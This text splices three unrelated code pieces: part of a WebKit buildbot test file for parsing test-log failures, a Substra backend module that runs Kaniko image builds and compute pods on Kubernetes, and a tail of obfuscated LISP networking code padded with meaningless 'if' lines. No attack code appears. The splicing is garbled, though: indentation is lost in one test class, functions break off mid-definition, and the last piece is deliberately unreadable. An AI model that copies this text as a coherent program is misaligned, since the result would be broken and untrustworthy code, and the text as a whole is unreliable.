        # Disabled tests (1881 of 1888 run) still count as a clean pass.
        self.assertFailures(0, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1881 tests of 1888 with 1881 successful
------------------------------
All tests successfully passed!
""")
    def test_one_failure(self):
        self.assertFailures(1, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1887 successful
------------------------------
Test suite failed
Crashed
    TestWTF.WTF.StringConcatenate_Unsigned
        **FAIL** WTF.StringConcatenate_Unsigned
C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84
Value of: makeString("hello ", static_cast<unsigned short>(42) , " world")
Actual: hello 42 world
Expected: "hello * world"
Which is: 74B00C9C
Testing completed, Exit status: 3
""")
    def test_multiple_failures(self):
        self.assertFailures(2, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1886 successful
------------------------------
Test suite failed
Crashed
    TestWTF.WTF.StringConcatenate_Unsigned
        **FAIL** WTF.StringConcatenate_Unsigned
C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84
Value of: makeString("hello ", static_cast<unsigned short>(42) , " world")
Actual: hello 42 world
Expected: "hello * world"
Which is: 74B00C9C
    TestWTF.WTF_Expected.Unexpected
        **FAIL** WTF_Expected.Unexpected
C:\cygwin\home\buildbot\slave\win-release\build\Tools\TestWebKitAPI\Tests\WTF\Expected.cpp:96
Value of: s1
Actual: oops
Expected: s0
Which is: oops
Testing completed, Exit status: 3
""")
    def test_one_timeout(self):
        self.assertFailures(1, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1887 successful
------------------------------
Test suite failed
Timeout
    TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment
Testing completed, Exit status: 3
""")
    def test_multiple_timeouts(self):
        self.assertFailures(2, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1886 successful
------------------------------
Test suite failed
Timeout
    TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment
    TestWTF.WTF_Lock.ContendedShortSection
Testing completed, Exit status: 3
""")
    def test_multiple_failures_and_timeouts(self):
        # 2 crashes + 2 timeouts -> 4 failed tests total.
        self.assertFailures(4, """...
worker/0 TestWTF.WTF_Variant.OperatorAmpersand Passed
worker/0 TestWTF.WTF_Variant.Ref Passed
worker/0 TestWTF.WTF_Variant.RefPtr Passed
worker/0 TestWTF.WTF_Variant.RetainPtr Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingMakeVisitor Passed
worker/0 TestWTF.WTF_Variant.VisitorUsingSwitchOn Passed
worker/0 exiting
Ran 1888 tests of 1888 with 1884 successful
------------------------------
Test suite failed
Crashed
    TestWTF.WTF.StringConcatenate_Unsigned
        **FAIL** WTF.StringConcatenate_Unsigned
C:\\cygwin\\home\\buildbot\\slave\\win-release\\build\\Tools\\TestWebKitAPI\\Tests\\WTF\\StringConcatenate.cpp:84
Value of: makeString("hello ", static_cast<unsigned short>(42) , " world")
Actual: hello 42 world
Expected: "hello * world"
Which is: 74B00C9C
    TestWTF.WTF_Expected.Unexpected
        **FAIL** WTF_Expected.Unexpected
C:\cygwin\home\buildbot\slave\win-release\build\Tools\TestWebKitAPI\Tests\WTF\Expected.cpp:96
Value of: s1
Actual: oops
Expected: s0
Which is: oops
Timeout
    TestWTF.WTF_PoisonedUniquePtrForTriviallyDestructibleArrays.Assignment
    TestWTF.WTF_Lock.ContendedShortSection
Testing completed, Exit status: 3
""")
class SVNMirrorTest(unittest.TestCase):
    # Checks that each builder's CheckOutSource step uses the SVNMirror URL
    # configured for it in config.json (or the default webkit.org URL).
    # CheckOutSource, source and c (the master config dict) are injected by
    # the master-config loading machinery.
    def setUp(self):
        # NOTE(review): file handle from open() is never closed — harmless
        # in a short-lived test process, but a `with` block would be tidier.
        self.config = json.load(open('config.json'))
    def get_SVNMirrorFromConfig(self, builderName):
        # Return the SVNMirror configured for builderName, falling back to
        # the canonical webkit.org repository URL.
        SVNMirror = None
        for builder in self.config['builders']:
            if builder['name'] == builderName:
                SVNMirror = builder.pop('SVNMirror', 'https://svn.webkit.org/repository/webkit/')
        return SVNMirror
    def test_CheckOutSource(self):
        # SVN mirror feature isn't unittestable now with source.oldsource.SVN(==source.SVN) , only with source.svn.SVN(==SVN)
        # https://bugs.webkit.org/show_bug.cgi?id=85887
        if issubclass(CheckOutSource, source.SVN):
            return
        # Compare CheckOutSource.baseURL with SVNMirror (or with the default URL) in config.json for all builders
        for builder in c['builders']:
            for buildStepFactory, kwargs in builder['factory'].steps:
                if str(buildStepFactory).split('.')[-1] == 'CheckOutSource':
                    CheckOutSourceInstance = buildStepFactory(**kwargs)
                    self.assertEqual(CheckOutSourceInstance.baseURL, self.get_SVNMirrorFromConfig(builder['name']))
class BuildStepsConstructorTest(unittest.TestCase):
# "Passing a BuildStep subclass to factory.addStep is deprecated. Please pass a BuildStep instance instead. Support will be dropped in v0.8.7."
# It checks if all builder's all buildsteps can be insantiated after migration.
# https://bugs.webkit.org/show_bug.cgi?id=89001
# http://buildbot.net/buildbot/docs/0.8.6p1/manual/customization.html#writing-buildstep-constructors
@staticmethod
def generateTests():
for builderNumber, builder in enumerate(c['builders']):
for stepNumber, step in enumerate(builder['factory'].steps):
builderName = builder['name'].encode('ascii', 'ignore')
setattr(BuildStepsConstructorTest, 'test_builder%02d_step%02d' % (builderNumber, stepNumber), BuildStepsConstructorTest.createTest(builderName, step))
@staticmethod
def createTest(builderName, step):
def doTest(self):
try:
buildStepFactory, kwargs = step
buildStepFactory(**kwargs)
except TypeError as e:
buildStepName = str(buildStepFactory).split('.')[-1]
self.fail("Error during instantiation | |
import kubernetes
import requests
import os
import json
import datetime
import logging
from django.conf import settings
from substrapp.utils import timeit
from substrapp.exceptions import PodErrorException, PodTimeoutException
import time
logger = logging.getLogger(__name__)
# Paths and container-registry endpoints injected via the environment.
MEDIA_ROOT = os.getenv('MEDIA_ROOT')
REGISTRY = os.getenv('REGISTRY')
REGISTRY_SCHEME = os.getenv('REGISTRY_SCHEME')
REGISTRY_PULL_DOMAIN = os.getenv('REGISTRY_PULL_DOMAIN')
# Kubernetes placement: the namespace and node this worker runs on.
NAMESPACE = os.getenv('NAMESPACE')
NODE_NAME = os.getenv('NODE_NAME')
COMPONENT = 'substra-compute'
# Pod security context values; note os.getenv returns strings (or None),
# so consumers must convert/validate as needed.
RUN_AS_GROUP = os.getenv('RUN_AS_GROUP')
RUN_AS_USER = os.getenv('RUN_AS_USER')
FS_GROUP = os.getenv('FS_GROUP')
# Kaniko image-build and registry configuration from Django settings.
KANIKO_MIRROR = settings.TASK['KANIKO_MIRROR']
KANIKO_IMAGE = settings.TASK['KANIKO_IMAGE']
COMPUTE_REGISTRY = settings.TASK['COMPUTE_REGISTRY']
HTTP_CLIENT_TIMEOUT_SECONDS = getattr(settings, 'HTTP_CLIENT_TIMEOUT_SECONDS')
REGISTRY_IS_LOCAL = settings.REGISTRY_IS_LOCAL
REGISTRY_SERVICE_NAME = settings.REGISTRY_SERVICE_NAME
# Map of every *_PVC environment variable, naming the persistent volume
# claims available to spawned pods.
K8S_PVC = {
    env_key: env_value for env_key, env_value in os.environ.items() if '_PVC' in env_key
}
class ImageNotFound(Exception):
    """Raised when a container image cannot be located in the registry."""
class BuildError(Exception):
    """Raised when building a container image fails."""
def k8s_get_cache_index_lock_file(cache_index):
    """Return the path of the lock file that guards *cache_index*."""
    return '/tmp/cache-index-{}.lock'.format(cache_index)
def k8s_try_create_file(path):
    """Atomically create *path*.

    Returns True when the file was created, False when it already existed.
    O_CREAT|O_EXCL makes creation-or-failure a single atomic operation, so
    this doubles as a cheap cross-process lock primitive.
    """
    flags = os.O_CREAT | os.O_EXCL
    try:
        os.close(os.open(path, flags))
    except FileExistsError:
        return False
    return True
def k8s_acquire_cache_index():
    """Reserve a build-cache index for this worker via lock files in /tmp.

    Returns None when the Celery worker concurrency is 1 (no contention
    possible, no index needed), otherwise the acquired index as a string.
    The caller must release it with k8s_release_cache_index().

    Raises:
        Exception: if no index could be acquired after all attempts.
    """
    celery_worker_concurrency = int(getattr(settings, 'CELERY_WORKER_CONCURRENCY'))
    if celery_worker_concurrency == 1:
        return None
    max_attempts = 12
    retry_delay_seconds = 5
    for attempt in range(1, max_attempts + 1):
        # Scan all candidate indices; creating the lock file atomically
        # claims the index (see k8s_try_create_file).
        for cache_index in range(1, celery_worker_concurrency + 1):
            lock_file = k8s_get_cache_index_lock_file(cache_index)
            if k8s_try_create_file(lock_file):
                return str(cache_index)
        # Every index is held by another worker. Back off before rescanning;
        # the previous implementation retried immediately, burning through
        # all attempts in microseconds without giving holders time to
        # release.
        if attempt < max_attempts:
            time.sleep(retry_delay_seconds)
    raise Exception(f'Could not acquire cache index after {max_attempts} attempts')
def k8s_release_cache_index(cache_index):
    """Release the lock file guarding *cache_index*.

    A None index (worker concurrency of 1, nothing was acquired) and an
    already-missing lock file are both silently ignored.
    """
    if cache_index is None:
        return
    path = k8s_get_cache_index_lock_file(cache_index)
    try:
        os.remove(path)
    except FileNotFoundError:
        # Already released (or never created) — nothing to do.
        pass
def watch_pod(name, watch_init_container=False):
    """Poll the kubernetes API until pod *name* reaches a terminal state.

    Only abnormal events consume the attempt budget: unexpected container
    'waiting' reasons and API read failures. Normal polling loops with a
    0.2s sleep and does not count against max_attempts.

    Raises:
        PodErrorException: the pod (or one of its containers) ended in error.
        PodTimeoutException: the attempt budget ran out before completion.
    """
    kubernetes.config.load_incluster_config()
    k8s_client = kubernetes.client.CoreV1Api()
    finished = False
    attempt = 0
    # Init containers get their own share of the error budget.
    max_attempts = 5 + (5 if watch_init_container else 0)
    error = None
    # When watching an init container we only start watching the main
    # container once the init container terminated successfully.
    watch_container = not watch_init_container
    logger.info(f'Waiting for pod {name}...')
    pod_status = None
    while (not finished) and (attempt < max_attempts):
        try:
            api_response = k8s_client.read_namespaced_pod_status(
                name=name,
                namespace=NAMESPACE,
                pretty=True
            )
            # Log phase transitions only once, not on every poll.
            if api_response.status.phase != pod_status:
                pod_status = api_response.status.phase
                logger.info(f'Status for pod "{name}" {api_response.status.phase} status')
            # Handle pod error not linked with containers
            # (e.g. a whole-pod failure or eviction by the scheduler).
            if api_response.status.phase == 'Failed' or (api_response.status.reason and
                                                         'Evicted' in api_response.status.reason):
                if api_response.status.reason:
                    error = api_response.status.reason
                else:
                    error = f'Pod phase : {api_response.status.phase}'
                logger.error(f'Status for pod "{name}" {api_response.status.phase.lower()} status')
                finished = True
                continue
            if watch_init_container:
                if api_response.status.init_container_statuses:
                    for init_container in api_response.status.init_container_statuses:
                        state = init_container.state
                        if state.terminated:
                            # TODO: support multiple init containers
                            if state.terminated.exit_code != 0:
                                finished = True
                                error = 'InitContainer: ' + get_pod_error(state.terminated)
                            else:
                                watch_container = True  # Init container is ready
                        else:
                            # 'PodInitializing'/'ContainerCreating' are normal
                            # transient states; anything else is an error.
                            if state.waiting and state.waiting.reason not in ['PodInitializing', 'ContainerCreating']:
                                error = 'InitContainer: ' + get_pod_error(state.waiting)
                                attempt += 1
                                logger.error(f'InitContainer for pod "{name}" waiting status '
                                             f'(attempt {attempt}/{max_attempts}): {state.waiting.message}')
            if watch_container:
                if api_response.status.container_statuses:
                    for container in api_response.status.container_statuses:
                        state = container.state
                        if state.terminated:
                            finished = True
                            error = None
                            if state.terminated.exit_code != 0:
                                error = get_pod_error(state.terminated)
                        else:
                            # {"ContainerCreating", "CrashLoopBackOff", "CreateContainerConfigError",
                            # "ErrImagePull", "ImagePullBackOff", "CreateContainerError", "InvalidImageName"}
                            if state.waiting and state.waiting.reason not in ['PodInitializing', 'ContainerCreating']:
                                error = get_pod_error(state.waiting)
                                attempt += 1
                                logger.error(f'Container for pod "{name}" waiting status '
                                             f'(attempt {attempt}/{max_attempts}): {state.waiting.message}')
            if not finished:
                time.sleep(0.2)
        except Exception as e:
            # API read failure (network blip, stale credentials, ...).
            attempt += 1
            logger.error(f'Could not get pod "{name}" status (attempt {attempt}/{max_attempts}): {e}')
    if error is not None:
        raise PodErrorException(f'Pod {name} terminated with error: {error}')
    if not finished:
        raise PodTimeoutException(f'Pod {name} didn\'t complete after {max_attempts} attempts')
def get_pod_error(state):
    """Format a container state (terminated/waiting) as 'reason (message)'."""
    if state.message is None:
        return state.reason
    return state.reason + f' ({state.message})'
def get_pod_name(name):
    """Return the actual pod name of the pod labelled app=<name>.

    Raises a plain Exception when no such pod exists.
    """
    kubernetes.config.load_incluster_config()
    k8s_client = kubernetes.client.CoreV1Api()
    api_response = k8s_client.list_namespaced_pod(
        NAMESPACE,
        label_selector=f'app={name}'
    )
    if not api_response.items:
        raise Exception(f'Could not get pod name {name}')
    # Take the last matching pod, as the original implementation did.
    return api_response.items.pop().metadata.name
def pod_exists(name):
    """True when pod *name* can be read in our namespace, False otherwise."""
    kubernetes.config.load_incluster_config()
    k8s_client = kubernetes.client.CoreV1Api()
    try:
        k8s_client.read_namespaced_pod(
            name=name,
            namespace=NAMESPACE)
        return True
    except Exception:
        # Any read failure (404 included) is treated as "does not exist".
        return False
def wait_for_pod_deletion(name):
    """Block until pod *name* no longer exists.

    Fix: the original loop had no sleep at all, so every iteration issued a
    back-to-back read against the kubernetes API server (a busy-wait).
    A short pause between probes keeps the load negligible without
    noticeably delaying detection.
    """
    while pod_exists(name):
        time.sleep(0.2)
@timeit
def get_pod_logs(name, container):
    """Fetch the logs of *container* in pod *name*.

    Best-effort: returns a placeholder string when the pod is absent or the
    log read fails.
    """
    kubernetes.config.load_incluster_config()
    k8s_client = kubernetes.client.CoreV1Api()
    if not pod_exists(name):
        return f'No logs for pod {name}'
    try:
        return k8s_client.read_namespaced_pod_log(
            name=name,
            namespace=NAMESPACE,
            container=container
        )
    except Exception:
        return f'No logs for pod {name}'
def container_format_log(container_name, container_logs):
    """Emit each line of *container_logs* to the logger, prefixed by the container name.

    Accepts either bytes or str.
    """
    if isinstance(container_logs, bytes):
        container_logs = container_logs.decode()
    for line in container_logs.split('\n'):
        logger.info(f'[{container_name}] {line}')
@timeit
def k8s_build_image(path, tag, rm):
    """Build a docker image with kaniko, serialising access to the layer cache.

    A cache slot is acquired before the build and always released afterwards.

    Fixes: cache_index is pre-initialised to None so that a failure inside
    k8s_acquire_cache_index() no longer raises NameError in the finally
    clause (which masked the original exception); the no-op
    'except Exception: raise' has been dropped.
    """
    cache_index = None
    try:
        cache_index = k8s_acquire_cache_index()
        _k8s_build_image(path, tag, rm, cache_index)
    finally:
        # Releasing None is a no-op, so this is safe on every path.
        k8s_release_cache_index(cache_index)
def _k8s_build_image(path, tag, rm, cache_index):
    """Run a kaniko pod that builds the Dockerfile at *path* and pushes it
    to the registry as substrafoundation/user-image:<tag>.

    cache_index selects the subPath of the shared layer-cache PVC, so
    concurrent workers never write the same cache directory. The pod is
    pinned to the same node as the worker through pod affinity. On failure
    the registry is checked: a concurrent build may already have pushed the
    image, in which case the error is swallowed. The pod is always deleted
    (and its logs captured) when this function created it.

    NOTE(review): the *rm* parameter is never used in this function —
    confirm whether it is still needed by callers.
    """
    kubernetes.config.load_incluster_config()
    k8s_client = kubernetes.client.CoreV1Api()
    # Pod names must be DNS-safe: keep only the last path component of the
    # tag and replace underscores.
    job_name = f'kaniko-{tag.split("/")[-1].replace("_", "-")}'
    dockerfile_fullpath = os.path.join(path, 'Dockerfile')
    # Mount only the subtuple subtree of the shared PVC into the pod.
    dockerfile_mount_subpath = path.split('/subtuple/')[-1]
    # kaniko build can be launched without privilege but
    # it needs some capabilities and to be root
    image = KANIKO_IMAGE
    command = None
    mount_path_dockerfile = path
    mount_path_cache = '/cache'
    args = [
        f'--dockerfile={dockerfile_fullpath}',
        f'--context=dir://{path}',
        f'--destination={REGISTRY}/substrafoundation/user-image:{tag}',
        '--cache=true',
        '--log-timestamp=true',
        '--verbosity=debug',
        '--snapshotMode=redo',
        '--push-retry=3',
        '--cache-copy-layers',
        '--single-snapshot'
    ]
    if REGISTRY_SCHEME == 'http':
        # Plain-http registry: allow insecure pushes.
        args.append('--insecure')
    if KANIKO_MIRROR:
        args.append(f'--registry-mirror={REGISTRY}')
        if REGISTRY_SCHEME == 'http':
            args.append('--insecure-pull')
    # https://github.com/GoogleContainerTools/kaniko/issues/778
    capabilities = ['CHOWN', 'SETUID', 'SETGID', 'FOWNER', 'DAC_OVERRIDE']
    pod_security_context = get_pod_security_context(root=True)
    container_security_context = get_security_context(root=True, add_capabilities=capabilities)
    container = kubernetes.client.V1Container(
        name=job_name,
        image=image if not COMPUTE_REGISTRY else f'{COMPUTE_REGISTRY}/{image}',
        command=command,
        args=args,
        volume_mounts=[
            {'name': 'dockerfile',
             'mountPath': mount_path_dockerfile,
             'subPath': dockerfile_mount_subpath,
             'readOnly': True}
        ],
        security_context=container_security_context
    )
    if mount_path_cache is not None:
        # Per-worker cache slot; readOnly because kaniko only reads layers here.
        container.volume_mounts.append({
            'name': 'cache',
            'mountPath': mount_path_cache,
            'subPath': cache_index,
            'readOnly': True
        })
    # Schedule the build on the same node as a substra-worker pod so the
    # ReadWriteOnce PVCs are reachable.
    pod_affinity = kubernetes.client.V1Affinity(
        pod_affinity=kubernetes.client.V1PodAffinity(
            required_during_scheduling_ignored_during_execution=[
                kubernetes.client.V1PodAffinityTerm(
                    label_selector=kubernetes.client.V1LabelSelector(
                        match_expressions=[
                            kubernetes.client.V1LabelSelectorRequirement(
                                key="app.kubernetes.io/component",
                                operator="In",
                                values=["substra-worker"]
                            )
                        ]
                    ),
                    topology_key="kubernetes.io/hostname"
                )
            ]
        )
    )
    spec = kubernetes.client.V1PodSpec(
        restart_policy='Never',
        affinity=pod_affinity,
        containers=[container],
        volumes=[
            {
                'name': 'dockerfile',
                'persistentVolumeClaim': {'claimName': K8S_PVC['SUBTUPLE_PVC']}
            }
        ],
        security_context=pod_security_context
    )
    if mount_path_cache is not None:
        spec.volumes.append({
            'name': 'cache',
            'persistentVolumeClaim': {'claimName': K8S_PVC['DOCKER_CACHE_PVC']}
        })
    pod = kubernetes.client.V1Pod(
        api_version='v1',
        kind='Pod',
        metadata=kubernetes.client.V1ObjectMeta(
            name=job_name,
            labels={'app': job_name, 'task': 'build',
                    'app.kubernetes.io/component': COMPONENT}
        ),
        spec=spec
    )
    # If the pod already exists (e.g. a concurrent build of the same tag),
    # just watch it instead of creating a duplicate.
    create_pod = not pod_exists(job_name)
    if create_pod:
        try:
            logger.info(f'Creating pod {NAMESPACE}/{job_name}')
            k8s_client.create_namespaced_pod(body=pod, namespace=NAMESPACE)
        except kubernetes.client.rest.ApiException as e:
            raise Exception(f'Error creating pod {NAMESPACE}/{job_name}. Reason: {e.reason}, status: {e.status}, '
                            f'body: {e.body}') from None
    try:
        watch_pod(job_name)
    except Exception as e:
        # In case of concurrent build, it may fail
        # check if image exists
        if not k8s_image_exists(tag):
            logger.error(f'Kaniko build failed, error: {e}')
            raise BuildError(f'Kaniko build failed, error: {e}')
    finally:
        if create_pod:
            # Capture the build logs before tearing the pod down.
            container_format_log(
                job_name,
                get_pod_logs(name=get_pod_name(job_name),
                             container=job_name)
            )
            k8s_client.delete_namespaced_pod(
                name=job_name,
                namespace=NAMESPACE,
                body=kubernetes.client.V1DeleteOptions(
                    propagation_policy='Foreground',
                    grace_period_seconds=0
                )
            )
@timeit
def k8s_get_image(image_name):
    """Fetch the registry manifest of user image *image_name*.

    Raises ImageNotFound on any non-200 response.
    """
    url = f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{image_name}'
    response = requests.get(
        url,
        headers={'Accept': 'application/json'},
        timeout=HTTP_CLIENT_TIMEOUT_SECONDS
    )
    if response.status_code != requests.status_codes.codes.ok:
        raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}')
    return response.json()
def k8s_image_exists(image_name):
    """True when the registry serves a manifest for *image_name*."""
    try:
        k8s_get_image(image_name)
        return True
    except ImageNotFound:
        return False
def k8s_remove_image(image_name):
    """Best-effort deletion of a user image from the docker registry.

    The registry delete API requires the manifest digest, so we first fetch
    the manifest (v2 Accept header) to read the Docker-Content-Digest
    response header, then DELETE by digest. All failures are logged and
    swallowed — deletion is opportunistic and must never break the caller.
    """
    logger.info(f'Deleting image {image_name}')
    try:
        response = requests.get(
            f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{image_name}',
            headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
            timeout=HTTP_CLIENT_TIMEOUT_SECONDS
        )
        if response.status_code != requests.status_codes.codes.ok:
            # Image absent (or registry unhappy): nothing to delete.
            # raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}')
            return
        digest = response.headers['Docker-Content-Digest']
        response = requests.delete(
            f'{REGISTRY_SCHEME}://{REGISTRY}/v2/substrafoundation/user-image/manifests/{digest}',
            headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
            timeout=HTTP_CLIENT_TIMEOUT_SECONDS
        )
        # A successful manifest delete returns 202 Accepted.
        if response.status_code != requests.status_codes.codes.accepted:
            # raise ImageNotFound(f'Error when querying docker-registry, status code: {response.status_code}')
            return
    except Exception as e:
        logger.exception(e)
def get_image_list_from_docker_registry():
    """Return the tag listing of the user-image repository, or None.

    Queries the registry catalog, then — for the user-image repository —
    the tags/list endpoint, returning its JSON body (a dict with 'name'
    and 'tags' keys per the registry v2 API).

    NOTE(review): builds push to 'substrafoundation/user-image' (see
    _k8s_build_image), so the catalog would normally list the repository
    under that full name; confirm that comparing against plain
    'user-image' ever matches, otherwise this always returns None.
    """
    response = requests.get(
        f'{REGISTRY_SCHEME}://{REGISTRY}/v2/_catalog',
        headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
        timeout=HTTP_CLIENT_TIMEOUT_SECONDS
    )
    response.raise_for_status()
    res = response.json()
    for repository in res['repositories']:
        # get only user-image repo, images built by substra-backend
        if repository == 'user-image':
            response = requests.get(
                f'{REGISTRY_SCHEME}://{REGISTRY}/v2/{repository}/tags/list',
                headers={'Accept': 'application/vnd.docker.distribution.manifest.v2+json'},
                timeout=HTTP_CLIENT_TIMEOUT_SECONDS
            )
            response.raise_for_status()
            return response.json()
    return None
def fetch_old_algo_image_names_from_docker_registry(max_duration):
    """Return the tags of user images older than *max_duration* seconds.

    The creation date of an image is taken as the most recent 'created'
    timestamp found in its v1 manifest history.

    Fix: images['tags'] is a list of tag *strings*, so the original
    old_images.append(image["name"]) indexed a str with a str key and
    raised TypeError on the first old image; we append the tag itself.
    """
    logger.info(f'Fetch image names older than {max_duration}s')
    images = get_image_list_from_docker_registry()
    old_images = []
    if images:
        for image in images['tags']:
            response = requests.get(
                f'{REGISTRY_SCHEME}://{REGISTRY}/v2/user-image/manifests/{image}',
                timeout=HTTP_CLIENT_TIMEOUT_SECONDS
            )
            response.raise_for_status()
            # take the most recent date as creation date
            created_date = max([
                datetime.datetime.strptime(json.loads(e['v1Compatibility'])['created'].split('.')[0],
                                           '%Y-%m-%dT%H:%M:%S')
                for e in response.json()['history']
            ])
            if (datetime.datetime.now() - created_date).total_seconds() >= max_duration:
                old_images.append(image)  # image is the tag string itself
    return old_images
def k8s_docker_registry_garbage_collector():
    """Run the docker-registry garbage collector inside the registry pod.

    Executes '/bin/registry garbage-collect' via the kubernetes exec API,
    streaming and collecting its stdout.

    Raises:
        Exception: when the exec stream reports a non-zero return code.
    """
    logger.info('Launch garbage collect on docker-registry')
    kubernetes.config.load_incluster_config()
    k8s_client = kubernetes.client.CoreV1Api()
    pod_name = get_pod_name('docker-registry')
    # 2>&1 folds stderr into the stdout stream we read below.
    exec_command = [
        '/bin/sh',
        '-c',
        '/bin/registry garbage-collect /etc/docker/registry/config.yml 2>&1'
    ]
    resp = kubernetes.stream.stream(
        k8s_client.connect_get_namespaced_pod_exec,
        pod_name,
        NAMESPACE,
        command=exec_command,
        stderr=True,
        stdin=True,
        stdout=True,
        tty=True,
        _preload_content=False,  # keep the stream open for interactive reads
    )
    logs = []
    while resp.is_open():
        resp.update(timeout=1)
        if resp.peek_stdout():
            lines = resp.read_stdout()
            for line in filter(None, lines.split("\n")):
                logs.append(line)
        else:
            # NOTE(review): logs the last collected line each idle tick; this
            # raises IndexError if the stream yields nothing before the first
            # idle poll — confirm whether that can happen in practice.
            logger.info(logs[-1])
    returncode = resp.returncode
    resp.close()
    if returncode != 0:
        raise Exception(
            f"Error running docker-registry garbage collector (exited with code {returncode})"
        )
@timeit
def k8s_compute(image_name, job_name, command, volumes, task_label,
                capture_logs, environment, remove_image, subtuple_key, compute_plan_key):
    """Run a compute task in a pod built from the given user image.

    Builds the task arguments (image pull URL, command, volumes, labels,
    environment) and delegates the actual pod lifecycle to _k8s_compute.
    In every case the pod is deleted afterwards; logs are captured first
    when capture_logs is set, and the image is removed when remove_image
    is set.

    NOTE(review): compute_plan_key is not used in this function — confirm
    whether it is still required by the call sites.
    """
    pull_domain = REGISTRY_PULL_DOMAIN
    if REGISTRY_IS_LOCAL:
        # Local registries are exposed through a NodePort: append it.
        try:
            registry_port = get_docker_registry_port()
        except Exception as e:
            raise Exception("Failed to retrieve docker registry node port") from e
        pull_domain += f":{registry_port}"
    # We cannot currently set up shm_size
    # Suggestion https://github.com/timescale/timescaledb-kubernetes/pull/131/files
    # 'shm_size': '8G'
    task_args = {
        'image': f'{pull_domain}/substrafoundation/user-image:{image_name}',
        'name': job_name,
        'command': command,
        'volumes': volumes,
        'label': task_label,
        'environment': environment
    }
    try:
        _k8s_compute(job_name, task_args, subtuple_key)
    except (PodErrorException, PodTimeoutException) as e:
        # Expected pod failures: log concisely, no traceback.
        logger.error(e)
        raise
    except Exception as e:
        # Unexpected failures: keep the full traceback.
        logger.exception(e)
        raise
    finally:
        if capture_logs:
            container_format_log(
                job_name,
                get_pod_logs(name=get_pod_name(job_name),
                             container=job_name)
            )
        delete_compute_pod(job_name)
        # Remove images
        if remove_image:
            k8s_remove_image(image_name)
def generate_volumes(volume_binds, name, subtuple_key):
    """Translate docker-style volume binds into k8s volumeMounts + volumes.

    Each bind path is mapped onto a PVC whose key in K8S_PVC contains the
    volume name. *name* and *subtuple_key* are accepted for interface
    compatibility but unused here.
    """
    volume_mounts = []
    volumes_by_name = {}
    for path, bind in volume_binds.items():
        if '/servermedias/' in path:
            # /MOUNT/PATH/servermedias/...
            volume_name = 'servermedias'
        else:
            # /MOUNT/PATH/medias/volume_name/...
            volume_name = path.split('/medias/')[-1].split('/')[0]
        subpath = path.split(f'/{volume_name}/')[-1]
        candidates = [key for key in K8S_PVC.keys()
                      if volume_name in key.lower()]
        if not candidates:
            raise Exception(f'PVC for {volume_name} not found')
        pvc_name = candidates.pop()
        volume_mounts.append({
            'name': volume_name,
            'mountPath': bind['bind'],
            'subPath': subpath,
            'readOnly': bind['mode'] != 'rw'
        })
        # Keyed by name so duplicate volumes collapse to one entry
        # (first-seen order, last definition wins — as before).
        volumes_by_name[volume_name] = {
            'name': volume_name,
            'persistentVolumeClaim': {'claimName': K8S_PVC[pvc_name]}
        }
    return volume_mounts, list(volumes_by_name.values())
@timeit
def _k8s_compute(name, | |
90 - 90: OoO0O00 / Ii1I % iIii1I11I1II1 / O0 * oO0o / I1IiiI
if 83 - 83: II111iiii . ooOoO0o / oO0o
if 54 - 54: ooOoO0o - iIii1I11I1II1 - I11i % Ii1I / II111iiii
if 80 - 80: i11iIiiIii % iIii1I11I1II1 / i11iIiiIii
lisp . lisp_geo_list [ OooOO0o0oOoO ] = i11I1Ii1Iiii1
return
if 66 - 66: OoOoOO00 . iIii1I11I1II1 * I1ii11iIi11i - Ii1I - iIii1I11I1II1
if 28 - 28: OoOoOO00 % OoooooooOO
if 13 - 13: IiII . Oo0Ooo - I11i / oO0o - Oo0Ooo - I1IiiI
if 84 - 84: II111iiii
